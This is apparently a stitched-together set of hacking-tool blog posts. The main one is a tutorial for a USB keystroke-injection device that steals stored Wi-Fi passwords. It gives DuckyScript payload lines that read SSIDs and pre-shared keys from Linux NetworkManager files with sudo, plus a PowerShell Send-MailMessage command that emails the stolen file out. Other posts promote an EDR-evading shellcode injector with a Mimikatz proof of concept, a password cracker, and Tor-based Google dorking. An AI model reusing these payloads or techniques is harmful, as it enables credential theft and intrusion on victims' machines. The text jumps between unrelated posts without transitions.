  2. PMKID Calculation: HMAC-SHA1[pmk + ("PMK Name" + bssid + clientmac)]

This is just for understanding, both are already implemented in find_pw_chunk and calculate_pmkid.

Obtaining the PMKID

Below are the steps to obtain the PMKID manually by inspecting the packets in WireShark.

*You may use Hcxtools or Bettercap to quickly obtain the PMKID without the below steps. The manual way is for understanding.

To obtain the PMKID manually from wireshark, put your wireless antenna in monitor mode, start capturing all packets with airodump-ng or similar tools. Then connect to the AP using an invalid password to capture the EAPOL 1 handshake message. Follow the next 3 steps to obtain the fields needed for the arguments.

Open the pcap in WireShark:

  • Filter with wlan_rsna_eapol.keydes.msgnr == 1 in WireShark to display only EAPOL message 1 packets.
  • In EAPOL 1 pkt, Expand IEEE 802.11 QoS Data Field to obtain AP MAC, Client MAC
  • In EAPOL 1 pkt, Expand 802.1 Authentication > WPA Key Data > Tag: Vendor Specific > PMKID is below

If access point is vulnerable, you should see the PMKID value like the below screenshot:

Demo Run

Disclaimer

This tool is for educational and testing purposes only. Do not use it to exploit the vulnerability on any network that you do not own or have permission to test. The authors of this script are not responsible for any misuse or damage caused by its use.



WiFi-password-stealer - Simple Windows And Linux Keystroke Injection Tool That Exfiltrates Stored WiFi Data (SSID And Password)

By: Zion3R


Have you ever watched a film where a hacker would plug-in, seemingly ordinary, USB drive into a victim's computer and steal data from it? - A proper wet dream for some.

Disclaimer: All content in this project is intended for security research purpose only.

 

Introduction

During the summer of 2022, I decided to do exactly that, to build a device that will allow me to steal data from a victim's computer. So, how does one deploy malware and exfiltrate data? In the following text I will explain all of the necessary steps, theory and nuances when it comes to building your own keystroke injection tool. While this project/tutorial focuses on WiFi passwords, payload code could easily be altered to do something more nefarious. You are only limited by your imagination (and your technical skills).

Setup

After creating pico-ducky, you only need to copy the modified payload (adjusted for your SMTP details for Windows exploit and/or adjusted for the Linux password and a USB drive name) to the RPi Pico.

Prerequisites

  • Physical access to victim's computer.

  • Unlocked victim's computer.

  • Victim's computer has to have an internet access in order to send the stolen data using SMTP for the exfiltration over a network medium.

  • Knowledge of victim's computer password for the Linux exploit.

Requirements - What you'll need


  • Raspberry Pi Pico (RPi Pico)
  • Micro USB to USB Cable
  • Jumper Wire (optional)
  • pico-ducky - Transformed RPi Pico into a USB Rubber Ducky
  • USB flash drive (for the exploit over physical medium only)


Note:

  • It is possible to build this tool using Rubber Ducky, but keep in mind that RPi Pico costs about $4.00 and the Rubber Ducky costs $80.00.

  • However, while pico-ducky is a good and budget-friedly solution, Rubber Ducky does offer things like stealthiness and usage of the lastest DuckyScript version.

  • In order to use Ducky Script to write the payload on your RPi Pico you first need to convert it to a pico-ducky. Follow these simple steps in order to create pico-ducky.

Keystroke injection tool

Keystroke injection tool, once connected to a host machine, executes malicious commands by running code that mimics keystrokes entered by a user. While it looks like a USB drive, it acts like a keyboard that types in a preprogrammed payload. Tools like Rubber Ducky can type over 1,000 words per minute. Once created, anyone with physical access can deploy this payload with ease.

Keystroke injection

The payload uses STRING command processes keystroke for injection. It accepts one or more alphanumeric/punctuation characters and will type the remainder of the line exactly as-is into the target machine. The ENTER/SPACE will simulate a press of keyboard keys.

Delays

We use DELAY command to temporarily pause execution of the payload. This is useful when a payload needs to wait for an element such as a Command Line to load. Delay is useful when used at the very beginning when a new USB device is connected to a targeted computer. Initially, the computer must complete a set of actions before it can begin accepting input commands. In the case of HIDs setup time is very short. In most cases, it takes a fraction of a second, because the drivers are built-in. However, in some instances, a slower PC may take longer to recognize the pico-ducky. The general advice is to adjust the delay time according to your target.

Exfiltration

Data exfiltration is an unauthorized transfer of data from a computer/device. Once the data is collected, adversary can package it to avoid detection while sending data over the network, using encryption or compression. Two most common way of exfiltration are:

  • Exfiltration over the network medium.
    • This approach was used for the Windows exploit. The whole payload can be seen here.

  • Exfiltration over a physical medium.
    • This approach was used for the Linux exploit. The whole payload can be seen here.

Windows exploit

In order to use the Windows payload (payload1.dd), you don't need to connect any jumper wire between pins.

Sending stolen data over email

Once passwords have been exported to the .txt file, payload will send the data to the appointed email using Yahoo SMTP. For more detailed instructions visit a following link. Also, the payload template needs to be updated with your SMTP information, meaning that you need to update RECEIVER_EMAIL, SENDER_EMAIL and yours email PASSWORD. In addition, you could also update the body and the subject of the email.

STRING Send-MailMessage -To 'RECEIVER_EMAIL' -from 'SENDER_EMAIL' -Subject "Stolen data from PC" -Body "Exploited data is stored in the attachment." -Attachments .\wifi_pass.txt -SmtpServer 'smtp.mail.yahoo.com' -Credential $(New-Object System.Management.Automation.PSCredential -ArgumentList 'SENDER_EMAIL', $('PASSWORD' | ConvertTo-SecureString -AsPlainText -Force)) -UseSsl -Port 587

Note:

  • After sending data over the email, the .txt file is deleted.

  • You can also use some an SMTP from another email provider, but you should be mindful of SMTP server and port number you will write in the payload.

  • Keep in mind that some networks could be blocking usage of an unknown SMTP at the firewall.

Linux exploit

In order to use the Linux payload (payload2.dd) you need to connect a jumper wire between GND and GPIO5 in order to comply with the code in code.py on your RPi Pico. For more information about how to setup multiple payloads on your RPi Pico visit this link.

Storing stolen data to USB flash drive

Once passwords have been exported from the computer, data will be saved to the appointed USB flash drive. In order for this payload to function properly, it needs to be updated with the correct name of your USB drive, meaning you will need to replace USBSTICK with the name of your USB drive in two places.

STRING echo -e "Wireless_Network_Name Password\n--------------------- --------" > /media/$(hostname)/USBSTICK/wifi_pass.txt

STRING done >> /media/$(hostname)/USBSTICK/wifi_pass.txt

In addition, you will also need to update the Linux PASSWORD in the payload in three places. As stated above, in order for this exploit to be successful, you will need to know the victim's Linux machine password, which makes this attack less plausible.

STRING echo PASSWORD | sudo -S echo

STRING do echo -e "$(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=ssid=).*') \t\t\t\t $(sudo <<< PASSWORD cat "$FILE" | grep -oP '(?<=psk=).*')"

Bash script

In order to run the wifi_passwords_print.sh script you will need to update the script with the correct name of your USB stick after which you can type in the following command in your terminal:

echo PASSWORD | sudo -S sh wifi_passwords_print.sh USBSTICK

where PASSWORD is your account's password and USBSTICK is the name for your USB device.

Quick overview of the payload

NetworkManager is based on the concept of connection profiles, and it uses plugins for reading/writing data. It uses .ini-style keyfile format and stores network configuration profiles. The keyfile is a plugin that supports all the connection types and capabilities that NetworkManager has. The files are located in /etc/NetworkManager/system-connections/. Based on the keyfile format, the payload uses the grep command with regex in order to extract data of interest. For file filtering, a modified positive lookbehind assertion was used ((?<=keyword)). While the positive lookbehind assertion will match at a certain position in the string, sc. at a position right after the keyword without making that text itself part of the match, the regex (?<=keyword).* will match any text after the keyword. This allows the payload to match the values after SSID and psk (pre-shared key) keywords.

For more information about NetworkManager here is some useful links:

Exfiltrated data formatting

Below is an example of the exfiltrated and formatted data from a victim's machine in a .txt file.

Wireless_Network_Name Password
--------------------- --------
WLAN1 pass1
WLAN2 pass2
WLAN3 pass3

USB Mass Storage Device Problem

One of the advantages of Rubber Ducky over RPi Pico is that it doesn't show up as a USB mass storage device once plugged in. Once plugged into the computer, all the machine sees it as a USB keyboard. This isn't a default behavior for the RPi Pico. If you want to prevent your RPi Pico from showing up as a USB mass storage device when plugged in, you need to connect a jumper wire between pin 18 (GND) and pin 20 (GPIO15). For more details visit this link.

Tip:

  • Upload your payload to RPi Pico before you connect the pins.
  • Don't solder the pins because you will probably want to change/update the payload at some point.

Payload Writer

When creating a functioning payload file, you can use the writer.py script, or you can manually change the template file. In order to run the script successfully you will need to pass, in addition to the script file name, a name of the OS (windows or linux) and the name of the payload file (e.q. payload1.dd). Below you can find an example how to run the writer script when creating a Windows payload.

python3 writer.py windows payload1.dd

Limitations/Drawbacks

  • This pico-ducky currently works only on Windows OS.

  • This attack requires physical access to an unlocked device in order to be successfully deployed.

  • The Linux exploit is far less likely to be successful, because in order to succeed, you not only need physical access to an unlocked device, you also need to know the admins password for the Linux machine.

  • Machine's firewall or network's firewall may prevent stolen data from being sent over the network medium.

  • Payload delays could be inadequate due to varying speeds of different computers used to deploy an attack.

  • The pico-ducky device isn't really stealthy, actually it's quite the opposite, it's really bulky especially if you solder the pins.

  • Also, the pico-ducky device is noticeably slower compared to the Rubber Ducky running the same script.

  • If the Caps Lock is ON, some of the payload code will not be executed and the exploit will fail.

  • If the computer has a non-English Environment set, this exploit won't be successful.

  • Currently, pico-ducky doesn't support DuckyScript 3.0, only DuckyScript 1.0 can be used. If you need the 3.0 version you will have to use the Rubber Ducky.

To-Do List

  • Fix Caps Lock bug.
  • Fix non-English Environment bug.
  • Obfuscate the command prompt.
  • Implement exfiltration over a physical medium.
  • Create a payload for Linux.
  • Encode/Encrypt exfiltrated data before sending it over email.
  • Implement indicator of successfully completed exploit.
  • Implement command history clean-up for Linux exploit.
  • Enhance the Linux exploit in order to avoid usage of sudo.


Top 20 Most Popular Hacking Tools in 2023

By: Zion3R

As last year, this year we made a ranking with the most popular tools between January and December 2023.

The tools of this year encompass a diverse range of cybersecurity disciplines, including AI-Enhanced Penetration Testing, Advanced Vulnerability Management, Stealth Communication Techniques, Open-Source General Purpose Vulnerability Scanning, and more.

Without going into further details, we have prepared a useful list of the most popular tools in Kitploit 2023:


  1. PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session


  2. Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


  3. Faraday - Open Source Vulnerability Management Platform


  4. CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare


  5. Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools


  6. Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases


  7. Waf-Bypass - Check Your WAF Before An Attacker Does


  8. PentestGPT - A GPT-empowered Penetration Testing Tool


  9. Sirius - First Truly Open-Source General Purpose Vulnerability Scanner


  10. LSMS - Linux Security And Monitoring Scripts


  11. GodPotato - Local Privilege Escalation Tool From A Windows Service Accounts To NT AUTHORITY\SYSTEM


  12. Bypass-403 - A Simple Script Just Made For Self Use For Bypassing 403


  13. ThunderCloud - Cloud Exploit Framework


  14. GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


  15. Kscan - Simple Asset Mapping Tool


  16. RedTeam-Physical-Tools - Red Team Toolkit - A Curated List Of Tools That Are Commonly Used In The Field For Physical Security, Red Teaming, And Tactical Covert Entry


  17. DNSWatch - DNS Traffic Sniffer and Analyzer


  18. IpGeo - Tool To Extract IP Addresses From Captured Network Traffic File


  19. TelegramRAT - Cross Platform Telegram Based RAT That Communicates Via Telegram To Evade Network Restrictions


  20. XSS-Exploitation-Tool - An XSS Exploitation Tool





Happy New Year wishes the KitPloit team!


NetProbe - Network Probe

By: Zion3R


NetProbe is a tool you can use to scan for devices on your network. The program sends ARP requests to any IP address on your network and lists the IP addresses, MAC addresses, manufacturers, and device models of the responding devices.

Features

  • Scan for devices on a specified IP address or subnet
  • Display the IP address, MAC address, manufacturer, and device model of discovered devices
  • Live tracking of devices (optional)
  • Save scan results to a file (optional)
  • Filter by manufacturer (e.g., 'Apple') (optional)
  • Filter by IP range (e.g., '192.168.1.0/24') (optional)
  • Scan rate in seconds (default: 5) (optional)

Download

You can download the program from the GitHub page.

$ git clone https://github.com/HalilDeniz/NetProbe.git

Installation

To install the required libraries, run the following command:

$ pip install -r requirements.txt

Usage

To run the program, use the following command:

$ python3 netprobe.py [-h] -t  [...] -i  [...] [-l] [-o] [-m] [-r] [-s]
  • -h,--help: show this help message and exit
  • -t,--target: Target IP address or subnet (default: 192.168.1.0/24)
  • -i,--interface: Interface to use (default: None)
  • -l,--live: Enable live tracking of devices
  • -o,--output: Output file to save the results
  • -m,--manufacturer: Filter by manufacturer (e.g., 'Apple')
  • -r,--ip-range: Filter by IP range (e.g., '192.168.1.0/24')
  • -s,--scan-rate: Scan rate in seconds (default: 5)

Example:

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -o results.txt -l

Help Menu

Scanner Tool options: -h, --help show this help message and exit -t [ ...], --target [ ...] Target IP address or subnet (default: 192.168.1.0/24) -i [ ...], --interface [ ...] Interface to use (default: None) -l, --live Enable live tracking of devices -o , --output Output file to save the results -m , --manufacturer Filter by manufacturer (e.g., 'Apple') -r , --ip-range Filter by IP range (e.g., '192.168.1.0/24') -s , --scan-rate Scan rate in seconds (default: 5) " dir="auto">
$ python3 netprobe.py --help                      
usage: netprobe.py [-h] -t [...] -i [...] [-l] [-o] [-m] [-r] [-s]

NetProbe: Network Scanner Tool

options:
-h, --help show this help message and exit
-t [ ...], --target [ ...]
Target IP address or subnet (default: 192.168.1.0/24)
-i [ ...], --interface [ ...]
Interface to use (default: None)
-l, --live Enable live tracking of devices
-o , --output Output file to save the results
-m , --manufacturer Filter by manufacturer (e.g., 'Apple')
-r , --ip-range Filter by IP range (e.g., '192.168.1.0/24')
-s , --scan-rate Scan rate in seconds (default: 5)

Default Scan

$ python3 netprobe.py 

Live Tracking

You can enable live tracking of devices on your network by using the -l or --live flag. This will continuously update the device list every 5 seconds.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l

Save Results

You can save the scan results to a file by using the -o or --output flag followed by the desired output file name.

$ python3 netprobe.py -t 192.168.1.0/24 -i eth0 -l -o results.txt
┏━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ IP Address   ┃ MAC Address       ┃ Packet Size ┃ Manufacturer                 ┃
┡━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 192.168.1.1  │ **:6e:**:97:**:28 │ 102         │ ASUSTek COMPUTER INC.        │
│ 192.168.1.3  │ 00:**:22:**:12:** │ 102         │ InPro Comm                   │
│ 192.168.1.2  │ **:32:**:bf:**:00 │ 102         │ Xiaomi Communications Co Ltd │
│ 192.168.1.98 │ d4:**:64:**:5c:** │ 102         │ ASUSTek COMPUTER INC.        │
│ 192.168.1.25 │ **:49:**:00:**:38 │ 102         │ Unknown                      │
└──────────────┴───────────────────┴─────────────┴──────────────────────────────┘

Contact

If you have any questions, suggestions, or feedback about the program, please feel free to reach out to me through any of the following platforms:

License

This program is released under the MIT LICENSE. See LICENSE for more information.



PassBreaker - Command-line Password Cracking Tool Developed In Python

By: Zion3R


PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks. 

Features

  • Wordlist-based password cracking
  • Brute force password cracking
  • Support for multiple hash algorithms
  • Optional salt value
  • Parallel processing option for faster cracking
  • Password complexity evaluation
  • Customizable minimum and maximum password length
  • Customizable character set for brute force attacks

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PassBreaker.git
  2. Install the required dependencies:

    pip install -r requirements.txt

Usage

python passbreaker.py <password_hash> <wordlist_file> [--algorithm]

Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.

Options

  • --algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
  • -s, --salt <salt>: Specify a salt value to use.
  • -p, --parallel: Enable parallel processing for faster cracking.
  • -c, --complexity: Evaluate password complexity before cracking.
  • -b, --brute-force: Perform a brute force attack.
  • --min-length <min_length>: Set the minimum password length for brute force attacks.
  • --max-length <max_length>: Set the maximum password length for brute force attacks.
  • --character-set <character_set>: Set the character set to use for brute force attacks.

Elbette! İşte İngilizce olarak yazılmış başlık ve küçük bir bilgi ile daha fazla kullanım örneği:

Usage Examples

Wordlist-based Password Cracking

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5

This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.

Brute Force Attack

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123

This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".

Password Complexity Evaluation

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity

This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.

Using Salt Value

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123

This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.

Parallel Processing

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel

This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.

These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.

Disclaimer

This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.

Contributing

Contributions are welcome! To contribute to PassBreaker, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:

License

PassBreaker is released under the MIT License. See LICENSE for more information.



TrafficWatch - TrafficWatch, A Packet Sniffer Tool, Allows You To Monitor And Analyze Network Traffic From PCAP Files

By: Zion3R


TrafficWatch, a packet sniffer tool, allows you to monitor and analyze network traffic from PCAP files. It provides insights into various network protocols and can help with network troubleshooting, security analysis, and more.

  • Protocol-specific packet analysis for ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, and NetBIOS.
  • Packet filtering based on protocol, source IP, destination IP, source port, destination port, and more.
  • Summary statistics on captured packets.
  • Interactive mode for in-depth packet inspection.
  • Timestamps for each captured packet.
  • User-friendly colored output for improved readability.
  • Python 3.x
  • scapy
  • argparse
  • pyshark
  • colorama

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/TrafficWatch.git
  2. Navigate to the project directory:

    cd TrafficWatch
  3. Install the required dependencies:

    pip install -r requirements.txt

python3 trafficwatch.py --help
usage: trafficwatch.py [-h] -f FILE [-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}] [-c COUNT]

Packet Sniffer Tool

options:
-h, --help show this help message and exit
-f FILE, --file FILE Path to the .pcap file to analyze
-p {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}, --protocol {ARP,ICMP,TCP,UDP,DNS,DHCP,HTTP,SNMP,LLMNR,NetBIOS}
Filter by specific protocol
-c COUNT, --count COUNT
Number of packets to display

To analyze packets from a PCAP file, use the following command:

python trafficwatch.py -f path/to/your.pcap

To specify a protocol filter (e.g., HTTP) and limit the number of displayed packets (e.g., 10), use:

python trafficwatch.py -f path/to/your.pcap -p HTTP -c 10

  • -f or --file: Path to the PCAP file for analysis.
  • -p or --protocol: Filter packets by protocol (ARP, ICMP, TCP, UDP, DNS, DHCP, HTTP, SNMP, LLMNR, NetBIOS).
  • -c or --count: Limit the number of displayed packets.

Contributions are welcome! If you want to contribute to TrafficWatch, please follow our contribution guidelines.

If you have any questions, comments, or suggestions about Dosinator, please feel free to contact me:

This project is licensed under the MIT License.

Thank you for considering supporting me! Your support enables me to dedicate more time and effort to creating useful tools like DNSWatch and developing new projects. By contributing, you're not only helping me improve existing tools but also inspiring new ideas and innovations. Your support plays a vital role in the growth of this project and future endeavors. Together, let's continue building and learning. Thank you!" 



RecycledInjector - Native Syscalls Shellcode Injector

By: Zion3R


(Currently) Fully Undetected same-process native/.NET assembly shellcode injector based on RecycledGate by thefLink, which is also based on HellsGate + HalosGate + TartarusGate to ensure undetectable native syscalls even if one technique fails.

To remain stealthy and keep entropy on the final executable low, do ensure that shellcode is always loaded externally since most AV/EDRs won't check for signatures on non-executable or DLL files anyway.

Important to also note that the fully undetected part refers to the loading of the shellcode, however, the shellcode will still be subject to behavior monotoring, thus make sure the loaded executable also makes use of defense evasion techniques (e.g., SharpKatz which features DInvoke instead of Mimikatz).


Usage

.\RecycledInjector.exe <path_to_shellcode_file>

Proof of Concept

This proof of concept leverages Terminator by ZeroMemoryEx to kill most security solution/agents present on the system. It is used against Microsoft Defender for Endpoint EDR.

On the left we inject the Terminator shellcode to load the vulnerable driver and kill MDE processes, and on the right is an example of loading and executing Invoke-Mimikatz remotely from memory, which is not stopped as there is no running security solution anymore on the system.



KaliPackergeManager - Kali Packerge Manager

By: Zion3R


kalipm.sh is a powerful package management tool for Kali Linux that provides a user-friendly menu-based interface to simplify the installation of various packages and tools. It streamlines the process of managing software and enables users to effortlessly install packages from different categories. 


Features

  • Interactive Menu: Enjoy an intuitive and user-friendly menu-based interface for easy package selection.
  • Categorized Packages: Browse packages across multiple categories, including System, Desktop, Tools, Menu, and Others.
  • Efficient Installation: Automatically install selected packages with the help of the apt-get package manager.
  • System Updates: Keep your system up to date with the integrated update functionality.

Installation

To install KaliPm, you can simply clone the repository from GitHub:

git clone https://github.com/HalilDeniz/KaliPackergeManager.git

Usage

  1. Clone the repository or download the KaliPM.sh script.
  2. Navigate to the directory where the script is located.
  3. Make the script executable by running the following command:
    chmod +x kalipm.sh
  4. Execute the script using the following command:
    ./kalipm.sh
  5. Follow the on-screen instructions to select a category and choose the desired packages for installation.

Categories

  • System: Includes essential core items that are always included in the Kali Linux system.
  • Desktop: Offers various desktop environments and window managers to customize your Kali Linux experience.
  • Tools: Provides a wide range of specialized tools for tasks such as hardware hacking, cryptography, wireless protocols, and more.
  • Menu: Consists of packages tailored for information gathering, vulnerability assessments, web application attacks, and other specific purposes.
  • Others: Contains additional packages and resources that don't fall into the above categories.

Update

KaliPM.sh also includes an update feature to ensure your system is up to date. Simply select the "Update" option from the menu, and the script will run the necessary commands to clean, update, upgrade, and perform a full-upgrade on your system.

Contributing

Contributions are welcome! To contribute to KaliPackergeManager, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about Tool Name, please feel free to contact me:



DorXNG - Next Generation DorX. Built By Dorks, For Dorks

By: Zion3R


DorXNG is a modern solution for harvesting OSINT data using advanced search engine operators through multiple upstream search providers. On the backend it leverages a purpose built containerized image of SearXNG, a self-hosted, hackable, privacy focused, meta-search engine.

Our SearXNG implementation routes all search queries over the Tor network while refreshing circuits every ten seconds with Tor's MaxCircuitDirtiness configuration directive. We have also disabled all of SearXNG's client side timeout features. These settings allow for evasion of search engine restrictions commonly encountered while issuing many repeated search queries.

The DorXNG client application is written in Python3, and interacts with the SearXNG API to issue search queries concurrently. It can even issue requests across multiple SearXNG instances. The resulting search results are stored in a SQLite3 database.


We have enabled every supported upstream search engine that allows advanced search operator queries:

  • Google
  • DuckDuckGo
  • Qwant
  • Bing
  • Brave
  • Startpage
  • Yahoo

For more information about what search engines SearXNG supports See: Configured Engines

Setup ️

LINUX ONLY ** Sorry Normies **

Install DorXNG

git clone https://github.com/researchanddestroy/dorxng
cd dorxng
pip install -r requirements.txt
./DorXNG.py -h

Download and Run Our Custom SearXNG Docker Container (at least one). Multiple SearXNG instances can be used. Use the --serverlist option with DorXNG. See: server.lst

When starting multiple containers wait at least a few seconds between starting each one.

docker run researchanddestroy/searxng:latest

If you would like to build the container yourself:

git clone https://github.com/researchanddestroy/searxng # The URL must be all lowercase for the build process to complete
cd searxng
DOCKER_BUILDKIT=1 make docker.build
docker images
docker run <image-id>

By default DorXNG has a hard coded server variable in parse_args.py which is set to the IP address that Docker will assign to the first container you run on your machine 172.17.0.2. This can be changed, or overwritten with --server or --serverlist.

Start Issuing Search Queries

./DorXNG.py -q 'search query'

Query the DorXNG Database

./DorXNG.py -D 'regex search string'

Instructions 

-h, --help            show this help message and exit
-s SERVER, --server SERVER
DorXNG Server Instance - Example: 'https://172.17.0.2/search'
-S SERVERLIST, --serverlist SERVERLIST
Issue Search Queries Across a List of Servers - Format: Newline Delimited
-q QUERY, --query QUERY
Issue a Search Query - Examples: 'search query' | '!tch search query' | 'site:example.com intext:example'
-Q QUERYLIST, --querylist QUERYLIST
Iterate Through a Search Query List - Format: Newline Delimited
-n NUMBER, --number NUMBER
Define the Number of Page Result Iterations
-c CONCURRENT, --concurrent CONCURRENT
Define the Number of Concurrent Page Requests
-l LIMITDATABASE, --limitdatabase LIMITDATABASE
Set Maximum Database Size Limit - Starts New Database After Exceeded - Example: -- limitdatabase 10 (10k Database Entries) - Suggested Maximum Database Size is 50k
when doing Deep Recursion
-L LOOP, --loop LOOP Define the Number of Main Function Loop Iterations - Infinite Loop with 0
-d DATABASE, --database DATABASE
Specify SQL Database File - Default: 'dorxng.db'
-D DATABASEQUERY, --databasequery DATABASEQUERY
Issue Database Query - Format: Regex
-m MERGEDATABASE, --mergedatabase MERGEDATABASE
Merge SQL Database File - Example: --mergedatabase database.db
-t TIMEOUT, --timeout TIMEOUT
Specify Timeout Interval Between Requests - Default: 4 Seconds - Disable with 0
-r NONEWRESULTS, --nonewresults NONEWRESULTS
Specify Number of Iterations with No New Results - Default: 4 (3 Attempts) - Disable with 0
-v, --verbose Enable Verbose Output
-vv, --veryverbose Enable Very Ver bose Output - Displays Raw JSON Output

Tips 

Sometimes you will hit a Tor exit node that is already shunted by upstream search providers, causing you to receive a minimal amount of search results. Not to worry... Just keep firing off queries. 

Keep your DorXNG SQL database file and rerun your command, or use the --loop switch to iterate the main function repeatedly. 

Most often, the more passes you make over a search query the more results you'll find. 

Also keep in mind that we have made a sacrifice in speed for a higher degree of data output. This is an OSINT project after all. 

Each search query you make is being issued to 7 upstream search providers... Especially with --concurrent queries this generates a lot of upstream requests... So have patience.

Keep in mind that DorXNG will continue to append new search results to your database file. Use the --database switch to specify a database filename, the default filename is dorxng.db. This probably doesn't matter for most, but if you want to keep your OSINT investigations seperate it's there for you.

Four concurrent search requests seems to be the sweet spot. You can issue more, but the more queries you issue at a time the longer it takes to receive results. It also increases the likelihood you receive HTTP/429 Too Many Requests responses from upstream search providers on that specific Tor circuit.

If you start multiple SearXNG Docker containers too rapidly Tor connections may fail to establish. While initializing a container, a valid response from the Tor Connectivity Check function looks like this:

If you see anything other than that, or if you start to see HTTP/500 response codes coming back from the SearXNG monitor script (STDOUT in the container), kill the Docker container and spin up a new one.

HTTP/504 Gateway Time-out response codes within DorXNG are expected sometimes. This means the SearXNG instance did not receive a valid response back within one minute. That specific Tor curcuit is probably too slow. Just keep going!

There really isn't a reason to run a ton of these containers... Yet...  How many you run really depends on what you're doing. Each container uses approximately 1.25GBs of RAM.

Running one container works perfectly fine, except you will likely miss search results. So use --loop and do not disable --timeout.

Running multiple containers is nice because each has its own Tor curcuit thats refreshing every 10 seconds.

When running --serverlist mode disable the --timeout feature so there is no delay between requests (The default delay interval is 4 seconds).

Keep in mind that the more containers you run the more memory you will need. This goes for deep recursion too... We have disabled Python's maximum recursion limit... 

The more recursions your command goes through without returning to main the more memory the process will consume. You may come back to find that the process has crashed with a Killed error message. If this happens your machine ran out of memory and killed the process. Not to worry though... Your database file is still good. 

If your database file gets exceptionally large it inevitably slows down the program and consumes more memory with each iteration...

Those Python Stack Frames are Thicc... 

We've seen a marked drop in performance with database files that exceed approximately 50 thousand entries.

The --limitdatabase option has been implemented to mitigate some of these memory consumption issues. Use it in combination with --loop to break deep recursive iteration inside iterator.py and restart from main right where you left off.

Once you have a series of database files you can merge them all (one at a time) with --mergedatabase. You can even merge them all into a new database file if you specify an unused filename with --database.

DO NOT merge data into a database that is currently being used by a running DorXNG process. This may cause errors and could potentially corrupt the database.

The included query.lst file is every dork that currently exists on the Google Hacking Database (GHDB). See: ghdb_scraper.py

We've already run through it for you...  Our ghdb.db file contains over one million entries and counting! 朗 You can download it here ghdb.db if you'd like a copy. 

Example of querying the ghdb.db database:

./DorXNG.py -d ghdb.db -D '^http.*\.sql$'

A rewrite of DorXNG in Golang is already in the works.  (GorXNG? | DorXNGNG?) 

We're gonna need more dorks...  Check out DorkGPT

Examples 

Single Search Query

./DorXNG.py -q 'search query'

Concurrent Search Queries

./DorXNG.py -q 'search query' -c4

Page Iteration Mode

./DorXNG.py -q 'search query' -n4

Iterative Concurrent Search Queries

./DorXNG.py -q 'search query' -c4 -n64

Server List Iteration Mode

./DorXNG.py -S server.lst -q 'search query' -c4 -n64 -t0

Query List Iteration Mode

./DorXNG.py -Q query.lst -c4 -n64

Query and Server List Iteration

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0

Main Function Loop Iteration Mode

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L4

Infinite Main Function Loop Iteration Mode with a Database File Size Limit Set to 10k Entries

./DorXNG.py -S server.lst -Q query.lst -c4 -n64 -t0 -L0 -l10

Merging a Database (One at a Time) into a New Database File

./DorXNG.py -d new-database.db -m dorxng.db

Merge All Database Files in the Current Working Directory into a New Database File

for i in `ls *.db`; do ./DorXNG.py -d new-database.db -m $i; done

Query a Database

./DorXNG.py -d new-database.db -D 'regex search string'


Associated-Threat-Analyzer - Detects Malicious IPv4 Addresses And Domain Names Associated With Your Web Application Using Local Malicious Domain And IPv4 Lists

By: Zion3R


Associated-Threat-Analyzer detects malicious IPv4 addresses and domain names associated with your web application using local malicious domain and IPv4 lists.


Installation

From Git

git clone https://github.com/OsmanKandemir/associated-threat-analyzer.git
